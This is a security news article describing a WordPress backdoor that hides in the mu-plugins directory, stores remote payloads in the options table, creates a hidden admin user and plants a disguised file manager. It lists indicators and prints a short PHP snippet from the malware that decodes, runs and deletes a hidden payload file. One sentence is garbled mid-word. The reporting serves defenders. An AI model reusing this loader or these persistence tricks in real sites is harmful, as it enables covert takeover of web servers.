Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites

A sophisticated WordPress malware campaign has been discovered operating through the rarely monitored mu-plugins directory, giving attackers persistent access to compromised websites while evading traditional security measures.

The malicious code, identified as wp-index.php, exploits WordPress’s “must-use plugins” functionality to maintain continuous operation without the possibility of deactivation through the admin panel.

The backdoor employs advanced obfuscation techniques, utilizing ROT13 encoding to disguise its command-and-control communications.

Upon execution, the malware fetches remote payloads from a concealed URL and stores them directly in the WordPress database under the option key “_hdra_core”, effectively bypassing filesystem-based security scans that focus primarily on file modifications.

Sucuri analysts identified this particularly insidious threat during routine malware investigations, noting its exceptional ability to maintain persistence across multiple infection vectors.

The researchers observed that the malware creates a hidden administrative user named “officialwp” while simultaneously hiding its presence from the WordPress user interface through carefully crafted filter functions.

The infection mechanism demonstrates remarkable sophistication in its execution methodology.

The primary loader script retrieves base64-encoded payloads from the remote server at hxxps://1870y4rr4y3d1k757673q[.]xyz/cron.php, which when decoded reveals a comprehensive malware framework.

This framework includes a covert file manager disguised as “pricing-table-3.php” within the active theme directory, protected by a custom authentication token “fsociety_OwnzU_4Evr_1337H4x!” transmitted via HTTP headers.

Database-Centric Persistence Strategy

The malware’s most concerning feature lies in its database-centric approach to maintaining persistence.

Rather than relying solely on file-based infections that can be detected through integrity monitoring, the backdoor stores its payload within WordPress’s options table.utes this stored payload before immediately cleaning up temporary files, leaving minimal forensic evidence.

$cronCore = wp_upload_dir()['basedir'] . '/.sess-' . md5(time()) . '.php';
file_put_contents($cronCore, base64_decode($payload));
include($cronCore);
@unlink($cronCore);




This approach ensures the malware survives standard cleanup procedures while providing attackers with remote code execution capabilities and complete administrative control over compromised WordPress installations.



Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now
The post Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites appeared first on Cyber Security News.
			

>>More